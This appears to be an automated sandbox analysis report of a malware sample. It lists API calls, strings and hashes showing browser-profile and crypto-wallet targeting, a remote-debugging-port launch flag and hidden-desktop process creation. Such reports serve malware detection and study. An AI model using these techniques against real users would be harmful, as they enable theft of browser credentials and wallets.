                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad0c08fbcca25956d4ff9785dbec72604859d57e763d5d5dcd2a38ec35082ba1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4212331245280EBEB119BBA84107E837A19F123ADF204556C5856BEE1DB72A14CC679
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 839b56806488cbb4484d35273f3bb62fe5ba1eef886e43951e7b7e70669366ac
• Instruction ID: 28a7195427b18bed691c762234884c536637b49fd2c9c4dbc4b8f267f713eaca
• Opcode Fuzzy Hash: 839b56806488cbb4484d35273f3bb62fe5ba1eef886e43951e7b7e70669366ac
• Instruction Fuzzy Hash: C2517D71D293486BCF617BFF9C899B4F2E56FA1334B150482B2108A1B69B708D807EE1
APIs
• RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,6CD6686A,00000001,00000364,00000000,FFFFFFFF,000000FF,?,6CD65DDF,00000000,00000000), ref: 6CD66DFD
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 7aab5dfd8ed8c82ba068b94427f3e6681ba7ce4f503d07e0258dc121134cad60
• Instruction ID: 48fffa6c7856e93c6a3194484ed62f502d6411ba420e79f4e01e0ce5455750af
• Opcode Fuzzy Hash: 7aab5dfd8ed8c82ba068b94427f3e6681ba7ce4f503d07e0258dc121134cad60
• Instruction Fuzzy Hash: 40F0B431246525E7EB011F27CC05A9F3758AB427B4F118127E818D7EB1DB30D412CAF0
APIs
• SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00FF2020
  • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: FolderPathlstrcpy
• String ID:
• API String ID: 1699248803-0
• Opcode ID: b7497ff01aef7700d9c24966f3f6e95fef17e0513238b08685c13a5bb6c6d040
• Instruction ID: 821e5ad8cda3415825fd3377c87997646aba41741a93d63e63a3fb58b3d75b52
• Opcode Fuzzy Hash: b7497ff01aef7700d9c24966f3f6e95fef17e0513238b08685c13a5bb6c6d040
• Instruction Fuzzy Hash: D9F03A72A1016DABDB15DFB8DC509BEB7FCEB48200F0045B6FA05E3291DA34AF458B90
APIs
• SHFileOperationA.SHELL32(?), ref: 00FF2949
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FileOperation
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3080627654-0
                                                                                                                                                                                                                                                          • Opcode ID: ed32dbbae085864e0dadff64f40a0666c3023a9ebc6e3d6a78e779a9fd28f2e8
                                                                                                                                                                                                                                                          • Instruction ID: 479b71f41dcfd0d4a289e3bd61885615303aa7ab0efc5026cf383d56223cf2d3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed32dbbae085864e0dadff64f40a0666c3023a9ebc6e3d6a78e779a9fd28f2e8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02E092B4D0421E9FDB44EFA8D9062EEBAF8FF48308F00406AC155F7245E77852458BA5
APIs
  • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
  • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
  • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
  • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
  • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
  • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
  • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
• FindFirstFileA.KERNEL32(?,?,01015802,010157FF,010162F0,010157FE,?,?,?), ref: 00FE9E59
• StrCmpCA.SHLWAPI(?,010162F4), ref: 00FE9E7A
• StrCmpCA.SHLWAPI(?,010162F8), ref: 00FE9E94
  • Part of subcall function 00FF076C: lstrlenA.KERNEL32(?,?,00FF733C,0101572F,0101572E,?,?,?,?,00FF8011), ref: 00FF0772
  • Part of subcall function 00FF076C: lstrcpyA.KERNEL32(00000000,00000000,?,00FF733C,0101572F,0101572E,?,?,?,?,00FF8011), ref: 00FF07A4
• StrCmpCA.SHLWAPI(?,Opera GX,010162FC,?,01015803), ref: 00FE9F26
• StrCmpCA.SHLWAPI(?,Brave,0101631C,01016320,010162FC,?,01015803), ref: 00FEA0A8
• StrCmpCA.SHLWAPI(?,Preferences), ref: 00FEA0C2
• CopyFileA.KERNEL32(?,?,00000001), ref: 00FEA182
• DeleteFileA.KERNEL32(?), ref: 00FEA251
• StrCmpCA.SHLWAPI(?), ref: 00FEA28F
• StrCmpCA.SHLWAPI(?), ref: 00FEA2F9
• StrCmpCA.SHLWAPI(00FECE8D), ref: 00FEA310
• _memset.LIBCMT ref: 00FEA339
• lstrcatA.KERNEL32(?,?), ref: 00FEA34B
• lstrcatA.KERNEL32(?,?), ref: 00FEA35B
• lstrcatA.KERNEL32(?, --remote-debugging-port=9223 --profile-directory="), ref: 00FEA36D
• _memset.LIBCMT ref: 00FEA3E3
• lstrcatA.KERNEL32(?,?), ref: 00FEA3F5
• lstrcatA.KERNEL32(?,?), ref: 00FEA405
• lstrcatA.KERNEL32(?, --remote-debugging-port=9223 --profile-directory="), ref: 00FEA417
• StrCmpCA.SHLWAPI(?), ref: 00FEA465
• CopyFileA.KERNEL32(?,?,00000001), ref: 00FEA525
• StrCmpCA.SHLWAPI(?,Google Chrome), ref: 00FEA5CD
• DeleteFileA.KERNEL32(?), ref: 00FEA62E
  • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
  • Part of subcall function 00FE8E72: lstrlenA.KERNEL32(?), ref: 00FE906B
  • Part of subcall function 00FE8E72: lstrlenA.KERNEL32(?), ref: 00FE9086
  • Part of subcall function 00FE95E0: lstrlenA.KERNEL32(?), ref: 00FE9A05
  • Part of subcall function 00FE95E0: lstrlenA.KERNEL32(?), ref: 00FE9A20
• StrCmpCA.SHLWAPI(?), ref: 00FEA65F
• CopyFileA.KERNEL32(?,?,00000001), ref: 00FEA71F
• DeleteFileA.KERNEL32(?), ref: 00FEA7B9
  • Part of subcall function 00FF1E6D: GetSystemTime.KERNEL32(?,010157AE,?), ref: 00FF1E9C
• FindNextFileA.KERNEL32(?,?), ref: 00FEA897
• FindClose.KERNEL32(?), ref: 00FEA8AB
Strings
• --remote-debugging-port=9223 --profile-directory=", xrefs: 00FEA361
• --remote-debugging-port=9223 --profile-directory=", xrefs: 00FEA40B
• Brave, xrefs: 00FEA0A0
• Preferences, xrefs: 00FEA0B6
• Opera GX, xrefs: 00FE9F1E
• \BraveWallet\Preferences, xrefs: 00FEA198
• Google Chrome, xrefs: 00FEA5C5
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: Filelstrcat$lstrcpylstrlen$CopyDeleteFind$_memset$CloseFirstNextSystemTime
• String ID: --remote-debugging-port=9223 --profile-directory="$ --remote-debugging-port=9223 --profile-directory="$Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
• API String ID: 59875412-4126839318
• Opcode ID: e61b6b02bc46670c73600b35d91dfd18458bae3f83ba4239adeabdd4b5386e43
• Instruction ID: 6a26f8a774db1d766dd325de54f69fa689087ec040f4ab398e27c217c50478b8
• Opcode Fuzzy Hash: e61b6b02bc46670c73600b35d91dfd18458bae3f83ba4239adeabdd4b5386e43
• Instruction Fuzzy Hash: D0521A7290016D9BCF61BB25DC46ADD7778AF04300F4141E1BA48B7126DAB9AF89EF81
APIs
• wsprintfA.USER32 ref: 00FF4EF9
• FindFirstFileA.KERNEL32(?,?), ref: 00FF4F10
• _memset.LIBCMT ref: 00FF4F2C
• _memset.LIBCMT ref: 00FF4F3D
• StrCmpCA.SHLWAPI(?,010159E0), ref: 00FF4F5E
• StrCmpCA.SHLWAPI(?,010159E4), ref: 00FF4F78
• wsprintfA.USER32 ref: 00FF4F9F
• StrCmpCA.SHLWAPI(?,01015616), ref: 00FF4FB3
• wsprintfA.USER32 ref: 00FF4FDC
• wsprintfA.USER32 ref: 00FF4FF3
  • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
  • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
  • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
  • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
  • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
  • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
• _memset.LIBCMT ref: 00FF5005
• lstrcatA.KERNEL32(?,?), ref: 00FF501A
• strtok_s.MSVCRT ref: 00FF505F
• _memset.LIBCMT ref: 00FF5071
• lstrcatA.KERNEL32(?,?), ref: 00FF5086
• strtok_s.MSVCRT ref: 00FF509F
• PathMatchSpecA.SHLWAPI(?,00000000), ref: 00FF50B4
                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?,01015A10,01015617), ref: 00FF516D
                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 00FF517D
                                                                                                                                                                                                                                                            • Part of subcall function 00FF2389: CreateFileA.KERNEL32(00FF5189,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00FF5189,?), ref: 00FF23A4
                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FF5193
                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?,00000000,?,000003E8,00000000), ref: 00FF519E
                                                                                                                                                                                                                                                          • strtok_s.MSVCRT ref: 00FF51C4
                                                                                                                                                                                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 00FF52E2
                                                                                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 00FF5302
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: File$_memsetlstrcatwsprintf$Findlstrcpystrtok_s$Delete$CloseCopyCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
• String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
• API String ID: 956187361-332874205
• Opcode ID: c7df6cf2796ff8eb21b43c3823a0f18dbce9f64a06453a162143d2e6d5273e33
• Instruction ID: 8f09362457ea3b3097b8e7314efc21748de4d1f0ebe16b515725e2dedc756730
• Opcode Fuzzy Hash: c7df6cf2796ff8eb21b43c3823a0f18dbce9f64a06453a162143d2e6d5273e33
• Instruction Fuzzy Hash: 1FC11872D0021EAFCF22AB64DC45AEE777DAF04300F4045A5FB08A7155DB75AB859F90
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
• String ID: %s\%s$%s\%s$%s\*
• API String ID: 2178766154-445461498
• Opcode ID: 113cef2e6e214ef5d9a80e27ee6b945851449370ac5cbfc02d7bed4173c722bc
• Instruction ID: d2b312265f5eb44374d62fbf97a1a1802016850395aaa14c612a7344701c5dcd
• Opcode Fuzzy Hash: 113cef2e6e214ef5d9a80e27ee6b945851449370ac5cbfc02d7bed4173c722bc
• Instruction Fuzzy Hash: 4F81147290022D9FCF60EB65DC49ADE77B8BF04300F4085E5E688A3115EF79AA859F90
APIs
• GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00FF5D0D
• HeapAlloc.KERNEL32(00000000), ref: 00FF5D14
• wsprintfA.USER32 ref: 00FF5D2D
• FindFirstFileA.KERNEL32(?,?), ref: 00FF5D44
• StrCmpCA.SHLWAPI(?,01015A80), ref: 00FF5D65
• StrCmpCA.SHLWAPI(?,01015A84), ref: 00FF5D7F
• CopyFileA.KERNEL32(?,?,00000001), ref: 00FF5E63
  • Part of subcall function 00FF59EA: _memset.LIBCMT ref: 00FF5A22
  • Part of subcall function 00FF59EA: _memset.LIBCMT ref: 00FF5A33
  • Part of subcall function 00FF59EA: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 00FF5A5E
  • Part of subcall function 00FF59EA: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 00FF5A7C
  • Part of subcall function 00FF59EA: lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 00FF5A90
  • Part of subcall function 00FF59EA: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 00FF5AA3
  • Part of subcall function 00FF59EA: StrStrA.SHLWAPI(00000000), ref: 00FF5B47
• DeleteFileA.KERNEL32(?), ref: 00FF5E86
• wsprintfA.USER32 ref: 00FF5DA6
  • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
  • Part of subcall function 00FF1E6D: GetSystemTime.KERNEL32(?,010157AE,?), ref: 00FF1E9C
  • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 00FF5EB5
                                                                                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 00FF5EC9
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 00FF5EF7
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 00FF5F0A
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FF5F16
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FF5F33
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcat$Filelstrcpy$Findlstrlen$Heap_memsetwsprintf$AllocCloseCopyDeleteFirstNextProcessSystemTime
                                                                                                                                                                                                                                                          • String ID: %s\%s$%s\*
                                                                                                                                                                                                                                                          • API String ID: 2636950706-2848263008
                                                                                                                                                                                                                                                          • Opcode ID: dd4630f2d13a89e03e14192911a9e33c58cac1e5ae6d6f24f76fa5fec2f61bf4
                                                                                                                                                                                                                                                          • Instruction ID: 9c76c62aaceccfe9ae207fd38dac4c94778b1670efd5d1a7c9efa91d356a526b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd4630f2d13a89e03e14192911a9e33c58cac1e5ae6d6f24f76fa5fec2f61bf4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 437128B294022C9FCF60AB60DC49ADD7779AF45310F4004E5B708A3116EB75AF85DF95
APIs
• _memset.LIBCMT ref: 00FE82DE
• wsprintfA.USER32 ref: 00FE82F7
• OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00FE8310
• CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00FE832C
• _memset.LIBCMT ref: 00FE834B
• lstrcatA.KERNEL32(?,?), ref: 00FE8360
• lstrcatA.KERNEL32(?,?), ref: 00FE8373
• lstrcatA.KERNEL32(?,010160F0), ref: 00FE8385
• _memset.LIBCMT ref: 00FE8394
• lstrcpyA.KERNEL32(?,00000000), ref: 00FE83C7
• _memset.LIBCMT ref: 00FE83E2
• CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 00FE843D
• Sleep.KERNEL32(00001388), ref: 00FE844C
• CloseDesktop.USER32(?), ref: 00FE8481
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
